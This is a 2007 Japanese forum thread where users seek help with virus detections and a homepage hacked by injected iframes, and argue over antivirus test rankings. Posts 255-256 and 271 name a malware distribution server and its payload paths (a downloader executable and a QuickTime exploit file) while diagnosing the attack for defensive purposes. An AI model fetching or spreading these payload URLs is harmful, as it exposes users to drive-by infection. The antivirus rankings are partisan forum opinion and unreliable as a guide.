【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ウィルス名:JAVA-BYTEVER.AY×3
ANICMOO.GEN×7
ファイル名:
JAVA-の3つのファイル名は「BaaaaBaa.class」「Baaaaa.class」「VaaaaaaaBaa.class」で拡張子がzipに
なっていました。ANICMOO.GEN×7の方は、拡張子がhtmでした。
【どんな症状が出るか】
ネットのページが見れなくなったりすることがあります、時間をおくか再起動するとまた
見れるようになる。見れないときは時間を置いてもずっと見れなくなる…翌日は見れることを
祈るしか…の状態です。
【症状が出る前に何をやったか】
「海外エロアニメサイトへの直リンページを片っ端から覗いていきました
【症状を解決しようとどのような処置を取ったか】
被害対策の部屋での基本的な事を全部、ルータの異常かもとサポセンに確認
結果ルータの異常ではなくPCの異常の可能性有。システムの復元でも症状治らず。
ウィルス検出時に隔離できなかったファイル達です。隔離してあるものは削除しました。
隔離できなかったこれらのファイルはどのようにして削除するものなのでしょうか…?
直接ファイルが潜んでいる場所を触ってみたりすると危険の様な気がして、直接的に
何もしていません…。どうかアドバイスお願いします
243:名無しさん@お腹いっぱい。
07/06/05 09:30:14
>>242
検出されてるのは、すでにパッチの出てるセキュリティホール狙いのものだから
Microsoft Updateが最新になっていればこいつらは発動しない
隔離できなかったのはブラウザとファイルの取り合いしてたからってパターンが多いんで
ブラウザのキャッシュクリアしてからもう一度スキャン
隔離できなかったこいつらが症状と直接関係ある可能性は小さいと思うが
「海外エロアニメサイトへの直リンページを片っ端から覗いていきました」だからなぁ…
「被害対策の部屋での基本的な事を全部」ってのはなにをどこまでした?
244:名無しさん@お腹いっぱい。
07/06/05 16:02:05
>>225
今回AV-Comparatives.orgのプロアクティブ試験のランク付けは、
一般消費者には、あまり意味のないもの。
ランク付けで最も重視された基準は、本物のウイルスの検出数ではなく、誤検出の数。
URLリンク(www.av-comparatives.org)
↑
この資料の6ページ目に、誤検出数の具体的な個数が書いていましたが、。
Fortinetという製品(1000以上の誤検出)以外は、
全サンプル中で、たった0個から36個の誤検出に過ぎませんでした。
実際のユーザー環境では、誤検出してもベンダーに真偽を確認すれば済むが、
本物のウイルスを検出できないのは致命的です。
今回からのプロアクティブ性能のランク付けでは、
誤検出が18個で、本物のウイルスを14628個できている製品よりも、
誤検出は8個でも、本物のウイルスは5659個しか検出できていない製品の方がランクが上となっています。
245:名無しさん@お腹いっぱい。
07/06/05 16:54:42
レスありがとうございました。
>243
URLリンク(www.higaitaisaku.com)
の、PCのお掃除、スパイウェア除去、転ばぬ先の杖等です。
Hijackthisでログ取っての質問をして(#91093)、色々指示されたことも
ありますが、解決には至らず…。PCメーカーのサポセンに電話しても、
色々指定されたことをしても効果なしで、再インストールしてくだサイといわれました。
キャッシュクリア後のスキャンも効果なしでした。
246:242
07/06/05 16:57:09
すいません、キャッシュクリアってインターネットオプションの
一時ファイルの「Cookieの削除」と「ファイルの削除」のことですよね…?
247:名無しさん@お腹いっぱい。
07/06/05 20:26:09
★ 世界でもっとも権威のある機関 AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 (2007年05月22日) ★
URLリンク(www.pcmag.com)
01位)WebWasher 99.83% (605,846)
02位)AVK 2007 99.56% (604,255)
03位)AntiVir 99.42% (603,408)
04位)F-Secure. 97.93% (594,333)
05位)Symantec 97.77% (593,355)
06位)Kaspersky 97.64% (592,606)
07位)Fortinet. 97.06% (589,028)
08位)Avast!. 96.32% (584,574)
09位)AVG. 96.15% (583,541)
10位)Rising 96.02% (582,772)
11位)BitDefender 95.68% (580,700)
12位)Norman.. 94.66% (574,476)
13位)Ikarus.. 92.54% (561,607)
14位)Panda. 92.09% (558,899)
15位)Trend Micro 90.97% (552,107)
16位)Nod32. 88.32% (536,043) ←←←←←←←←←←←←←←←←←←←←←←←←←←←←
17位)McAfee 87.28% (529,680)
★ A v a s t ! 、A V G, ウ イ ル ス キ ラ ー 、 バ ス タ ー より格段に検出力が劣る
N O D 3 2 (笑)
248:名無しさん@お腹いっぱい。
07/06/05 20:29:21
■NOD32が該当すると思われる専門家の指摘
URLリンク(internet.watch.impress.co.jp)
>ただし、「マイナーなベンダーの検知率が高いというわけではない。中には、ヒューリステックに頼りすぎて、
>ウイルスの検体を集めず、ちゃんとシグネチャを作らないところもある」と補足した。
■新種マルウェアの検出もほとんど駄目
スレリンク(sec板:404番)
■新種ルートキットの検出も駄目
スレリンク(sec板:410番)
249:名無しさん@お腹いっぱい。
07/06/05 21:29:26
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 「カスペルスキーインターネットセキュリティ6.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されています」
【スパイウェア対策ソフト】 「Ad-aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「自分のHPを見ると『疑わしいHTTPオブジェクト
<URLリンク(81.95.149.28) にトロイ 「Trojan-Downloader.JS.Psyme.gr」を検知しました』
と表示されます」
【どんな症状が出るか】「同上」
【症状が出る前に何をやったか】 「いつも見ているサイトから同じトロイが検知されました」
【症状を解決しようとどのような処置を取ったか】 「カスペルスキーを導入・PC内のウイルスを全削除、AD-awareSEでスパイウェアを一掃」
【その他の質問】 「現在脅威はありませんと表示されているのに何故か自分のHPからはトロイが検知されています。
最近になってネットが重くなったのもこのせいでしょうか?
ウイルスに関しては右も左もわからない状態で辟易しています。どうにか自サイトからウイルスが検知されないようにしたいのですがお願いします。」
250:名無しさん@お腹いっぱい。
07/06/05 21:54:29
URLリンク(www.av-comparatives.org)
URLリンク(www.itmedia.co.jp)
独立組織のAV-Comparatives.orgが6月1日に発表した。
今回の検証は、2月に発表されたウイルス対策ソフト比較の第2弾として、未知の脅威をどの程度事前に検出できるかを検証した。
各ソフトを2月以降アップデートしない状態で、2月2日から5月2日の間に入手した新しいマルウェアサンプルの検出率を調べている。
テストの結果、3段階評価で最も高い「ADVANCED+」の評価を獲得した
「NOD32 Anti-Virus」(ESET)は、68%の確率で新しいマルウェアサンプルを検出した。
251:名無しさん@お腹いっぱい。
07/06/05 22:18:05
●「PC WORLD」によるNOD32の評価
URLリンク(www.pcworld.com)
"NOD32's overall malware detection rate wasn't stellar, however. When pitted against AV-Test.org's nearly 900,000-strong "zoo"
of Trojans, viruses, and other malware, NOD32 caught only 90 percent, compared to the 96 percent rate of top performers Kaspersky Anti-Virus 6,
Symantec Norton AntiVirus 2007, and BitDefender Antivirus 10. It fared surprisingly poorly with 32-bit Windows viruses (approximately 1 in 11 samples in the zoo), catching only 73 percent.
In disinfection tests, NOD32 cleaned up all malware files but missed resulting changes to the Hosts network settings
file and most of the less-important Registry changes, for a disappointing 55 percent success rate."
しかしながら、NOD32のマルウェアの総合的な検出力はより優れているとはいえない。
AV-Test.orgのトロイ、ウイルス、その他のマルウェアなどの"約90万の"zoo"の検体に対しては、
優秀なカスペルスキー、ノートン、BitDefenderなどが検出率96%の成績を占めるのに比べ、NOD32はたったの90%しか検出しなかった。
情けないことには、32ビットのWindowsウイルスに至っては、たったの73%と驚くほど検出性能が低かった。
除去テストでも、すべてのマルウェアを取り除くことができたが、がっかりしたことには、ホストのネットワークの設定ファイルや
比較的重要ではないレジストリの変更に対しては、55%しか駆除できなかった。
252:名無しさん
07/06/05 22:22:47
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 「ウィルスバスター」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「ウィルスバスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「○」
【ルータの有無】 「?」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Neroってソフトについてたウィルス(名前わかりません)」
【どんな症状が出るか】 「タスクマネージャーが開けず、
レジストリをいじって直そうと思っても直せない。
(起動すると
このファイルはほかのプログラムでつかわれています。とでます。)」
【症状が出る前に何をやったか】 「友達からファイル共有ソフトを
使って入手したソフトをもらった。」
【症状を解決しようとどのような処置を取ったか】 「レジストリを起動」
【その他の質問】 「」
初心者であんまりわかりませんがよろしくお願いします。
253:名無しさん@お腹いっぱい。
07/06/06 01:53:29
>>249
「自分のHP」のURLを書いて欲しい
回答に必要な情報なんで
>>252
ご愁傷様。その友達とやらを恨んであげてください
254:名無しさん@お腹いっぱい。
07/06/06 04:15:52
>>252
>>13
255:名無しさん@お腹いっぱい。
07/06/06 07:27:28
>>249
ほぼ確実なこと
あなたのサイトが改竄されており、閲覧する人を危険にさらしている。
わからんこと
あなたも感染している。
サイトの該当するiframe(だと思う)を取り除く。
サーバのOSやWebサーバやCGI等に脆弱性が無いかを
(必要ならサーバ管理者に)確認し対処する。
先方がPHPを使っていることからphpBB等は特に注意。
あるいはサイトを(一時的にしろ恒久的にしろ)閉鎖する。
ドメインは中米パナマ。
中南米によくある欧米の銀行口座を狙ったプロの犯行と思われる。
exe以外にQuickTimeのリスト(McAfeeいわくMS06-006)も降ってくる。
256:名無しさん@お腹いっぱい。
07/06/06 07:39:57
追記
81.95.149.28/logo/file.php
振ってくるのはfile.exe。小さいのでたぶんDownloader。
AntiVir、AVG、Kaspersky、McAfeeなどで捕獲可能。
81.95.149.28/logo/qt.php
降ってくるのはmovie.qtl。
QuickTimeの脆弱性を狙うものと思われるファイル。
McAfeeがMS06-006判定(MS06-006はWinowsMediaPlayerだけど)。
QuickTimeはアップデートしていない人もいると思うので注意。
ディレクトリの logo を try にしても似たような物(同じではない)が降ってくる。
257:名無しさん@お腹いっぱい。
07/06/06 09:35:14
>>245-246
キャッシュのクリアはそれでおk
キャッシュクリア後のスキャンも効果なしってのは
隔離されなかったファイルが検出され続けるってこと?
それならファイルのパス書いてみてくれ
あと、ページを見られないときってのはブラウザだけがつながらない?
それともメールとかほかのネットワーク接続も切れるの?
258:242
07/06/06 21:26:06
>257
今は何も検出はされない状態です。
ただ、キャッシュクリア後などした後のスキャンの日付に、隔離できなかった
3つと7つのファイルがログにあるのですが…。今スキャン行っても何も検出されない
のはもう大丈夫ということなのでしょうか…
JAVAの3つがこのような感じです。
C:\Documents and Settings\ユーザー名\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\crtdcghcn.jar-1d0cf4ed-4b0813b9.idx
ANICMOOの7つがこのような感じです。
C:\Documents and Settings\中江心\Local Settings\Temporary Internet Files\Content.IE5\0PMB4PA7\123[1].html
ページが見れない時は全部見れません。2chブラウザも、メール(OfficeOutlook)ネットに関与
する行動が全部できない状態です。また被害対策部屋を読んでからはインターネット一時ファイアル
は閉じる度削除する設定にしてあります。
259:名無しさん@お腹いっぱい。
07/06/07 08:35:38
>>258
BytevarのほうはJAVAのキャッシュだね
これはフォルダたどってって手動で削除可
けど最初とファイル名変わってない?
消しても復活するようなら引き込み役とかいそうだけど
ANICMOOはIEのキャッシュのようだが…消えないってのはどういうことだろう
インターネットオプションで一時ファイルの削除じゃなくて
隣の「設定」ボタンから「ファイルの表示」選択した場合
一覧の中に問題のファイルはある?あれば削除
接続できないのは正直お手上げ状態だけど
ウイルスバスターのパーソナルファイアウォールのログや
Windowsのイベントログにそれっぽいのが残ってたりしない?
260:名無しさん@お腹いっぱい。
07/06/07 20:51:28
>259
拡張子がidxなのは…これのZipは同じフォルダの中には見当たらなかったので
同じファイル名の拡張子がidxがあったので書きました。
隔離できなかったBYTEVARの3つのファイルは、フォルダの場所辿って開いてみても
一応見当たりませんでした、ただ拡張子がidxになってる同一名のファイルが
一つあったというぐらいで…
ANICMOOのほうは、ちょっと今確認することはできないのですけど
どちらも今スキャン行った際には何も検出はされない状態です、隔離できなかった
ウィルスログの日付も一月前程なので…ひょっとしたら記憶違いでIEキャッシュ削除前
だったのかもしれません…ごめんなさい。
とりあえず検出されない今は大丈夫なんでしょうか…?
ファイアウォールログもイベントログも確認していません。
帰ったら確認してみます、初めて知る言葉なんですがイベントログ(コントロールパネル→
管理ツール→イベントビュアー)を開いたものですか?今会社のPCで見ていますが
エラー(赤丸×)マークと、警告マークとあるのですが、もし発見した場合どのような
処置を取るとよいでしょうか?
色々ページ見てるんですがイマイチ分かりません…
261:名無しさん@お腹いっぱい。
07/06/07 22:38:11
>>260
拡張子idxのファイルはJAVAがclassファイルやjarファイルキャッシュするときに
セットでできるものだから本体のほうがなければそれでOK
ANICMOOも検出されないなら現状では問題ない
ファイアウォールもイベントログももしかしたら
つながらないときに特有の現象でも出ててヒントにならないかな~って程度のもので、
あまり深い理由があって訊いた訳でもないんだ、スマン
262:名無しさん@お腹いっぱい。
07/06/09 06:19:35
まだGDI+か。またアイコンか。
Panda Panda URLリンク(blogs.pandasoftware.com)
icoで「画像とFAXビューア」やエクスプローラが0除算落ち。
今のところ攻撃には使えないので放置。
前半のYahoo!Messenger8.0についてはこれもついでに。
Symantec URLリンク(www.symantec.com)
こちらはexploitも公開済み。8.1にアップデートせよ。
もっとも、日本語版は7.0で更新が止まっているので知らん。
263:名無しさん@お腹いっぱい。
07/06/09 07:09:24
質問があります.
mp3ファイルが置いてあるフォルダ内に何かのCDジャケットを隠しファイル(jpg)で生成するウィルスは何て言う名前のウィルスでしたっけ?
よろしくお願いします
264:名無しさん@お腹いっぱい。
07/06/09 17:02:37
眠いさん少し休んだ方がいいんとちゃいますか?
ネット感覚を取り戻してください
265:名無しさん@お腹いっぱい。
07/06/09 22:02:54
URLリンク(www.f-secure.com)
RUNは基本だな
266:名無しさん@お腹いっぱい。
07/06/11 19:17:48
267:名無しさん@お腹いっぱい。
07/06/12 00:55:48
メッセンジャーが起動しない上、ネットに接続できねー。
だが別のユーザーならネットに接続できる…
ウイルスなのかな…?
268:名無しさん@お腹いっぱい。
07/06/12 11:53:01
By the time Virus became self-aware it had spread into millions of computer servers across the planet. Ordinary computers in office buildings, dorm rooms everywhere.
It was software in Microsoft.
There was no system core it could not be shutdown.
The attack began at 6:18 PM, just as he said it would.
Judgment Day, the day the human race was almost destroyed by the weapons they'd built to protect themselves.
I should have realized it was never our destiny to stop Judgment Day, it was merely to survive it, together.
The Terminator knew he tried to tell us, but I didn't want to hear it.
Maybe the future has been written.
I don't know all I know is what the Terminator taught me never stop fighting.
And I never will.
The battle has just begun.
269:名無しさん@お腹いっぱい。
07/06/12 14:47:43
>>268
Delusion without permission
270:名無しさん@お腹いっぱい。
07/06/12 16:54:27
トレンドのオンラインスキャンは、9Xを外したな。
windows9Xはどこまでも使いづらくするつもりか・・・( ´Д⊂ヽ
271:名無しさん@お腹いっぱい。
07/06/13 00:31:55
【使用OS】 「Windows Vista」
【Microsoft Update(MU)の状態】 「最新(自動更新で、最終更新日は6/9です)」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されています」
【スパイウェア対策ソフト】 「ウィルスバスター2007」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「しています」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スパイウェアが3つ」
【どんな症状が出るか】 「自分のHPを見ると、『警告 危険なWebサイトです』というスパイウェアの警告が表示されます。
アドレスは『81.95.149.28/logo/index.php』です。
ファイルマネージャから、該当箇所と思われるiframeを取り除いて再びアクセスすると、
その時は警告は表示されないのですが、翌日アクセスすると再び同じ警告が出て、
確認するとiframeが組み込まれています。
今現在は、ウィルスもスパイウェアも検出されていません。
が、翌日になるとまたスパイウェアが自サイトから見つかる状況です。」
【症状が出る前に何をやったか】 「サイト閲覧
(ブックマークしているサイトばかりで、新しいページは見ていないと思います)」
【症状を解決しようとどのような処置を取ったか】 「ウィルス・スパイウェアの検索と削除」
【その他の質問】 「」
お分かりになる方いらっしゃいましたら、アドバイス頂けないでしょうか?
272: ◆N9P3SuvBPo
07/06/13 00:45:20
>271
今、そこ行って来た。
確かにIframeが埋め込まれてるね。
さらに、iframeで指定されたアドレスに飛んでみると、スクリプトの記述があるね。
しかし、あのvistaでMicrosoftUpdate最新で、対策ソフトも有って、ルータも有る。
それで、サイト閲覧だけでこうなるなんて考えられないな。
もしかして…サイト見ている時、
『実行するにはあなたの許可が必要です』っていう窓が出てきて、それに対して「YES」を押したとか?
…直前で気づくよな、それだと
273:271
07/06/13 01:01:17
>272
早速のお返事ありがとうございます。
そして書き方が悪くてすいません。
81.95.149.28/logo/index.phpは、ウィルスバスターの警告ウィンドウに表示されていたアドレスで、
自サイトのアドレスではないんですが…、というのが伝わっていてのご回答だったらすいません…。
ちなみに『実行するには~』という窓は、記憶する限り出てきていないです。
274: ◆N9P3SuvBPo
07/06/13 01:07:51
>273
>自サイトのアドレスではないんですが…
あれ?
>271では
>【どんな症状が出るか】 「自分のHPを見ると、『警告 危険なWebサイトです』というスパイウェアの警告が表示されます。
>アドレスは『81.95.149.28/logo/index.php』です。
って書いてあるんだけど…
>ちなみに『実行するには~』という窓は、記憶する限り出てきていないです。
UAC=ユーザーアカウント制御の画面が出てないのに、マルウェアにやられた?
275: ◆N9P3SuvBPo
07/06/13 01:22:59
仕方ない…誘導する
URLリンク(www.higaitaisaku.com)
↑の「PCトラブル質問掲示板」で質問
276:名無しさん@お腹いっぱい。
07/06/13 01:25:17
URLリンク(suzukiairi.net)
これ押しちゃったんですがやばいですか?
なんか字がいっぱい書いてあるメモ帳みたいなのが表示されて
今のトコなんもないんですけど・・・
277:271
07/06/13 01:35:30
>275
バスターの警告ウィンドウに「アドレス」という項目があって、
そのつもりで書いてました…。文章悪くてすいません…。
質問掲示板、行ってみます!ありがとうございました!
278:名無しさん@お腹いっぱい。
07/06/13 01:45:19
>>276
PHP入れてないだろ? なら無問題
279:名無しさん@お腹いっぱい。
07/06/13 08:04:36
>>277
>>255-256
280:277
07/06/13 15:44:08
>279
そちらも参照して、iframeの削除とキャッシュのクリアはやってみました。
また、HPでphpは使っていません。が、やはりHPの改竄がされてしまっているようです…。
サーバーは、2つ使っていて2つとも改竄されてしまっているので、
サーバーではなく、やはりこちらのパソコンの問題だと思うのですが、ウィルスも検出されません。
ちなみに、改竄された自サイトにアクセスした時に警告が出て、その時に隔離されたウィルスのログは
"ウイルスログ","2007/06/13","B-PC"
"時刻","検索の種類","種類","ウイルス名",
"ファイル名","ウイルス検出時の処理","駆除できない場合の処理"
"12:03","リアルタイム検索","ファイル","JS_PSYME.AGB",
"C:\Users\b\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\2XV27BGG\index_mp[1].htm","隔離 済み(安全です)",""
です。
私も同じく、ネットにつながらなくなったり重くなったりしています。
281:名無しさん@お腹いっぱい。
07/06/13 17:09:41
>>280
だから切り分けろって。
そのPCが何か踏んでいて改竄しているのか、
第三者(海外など)から改竄されているのか。
何か踏んでそのPCからパスワード抜かれた可能性もあるから
サイトのパスワードも別PCで変えて、その上で
そのPCでしばらくアクセスしない(メンテは別PCでする)。
それでも改竄されるなら後者だろ?
あとはサーバ管理者と話せ。
282:名無しさん@お腹いっぱい。
07/06/13 17:26:28
>>280
あとURLリンク(www.ipa.go.jp)にも報告したほうがいいよ
サーバもログインID&パスワードを感染していない安全なPCで変更したほうがいいよ
283:名無しさん@お腹いっぱい。
07/06/13 20:31:43
流れぶったぎってわるいがBITSネタ
BITSを使って侵入してくる悪者たち
URLリンク(itpro.nikkeibp.co.jp)
284:名無しさん@お腹いっぱい。
07/06/14 20:24:15
Web 2.0は危険がいっぱい 悪意のJavaScriptで情報が漏えい
URLリンク(itpro.nikkeibp.co.jp)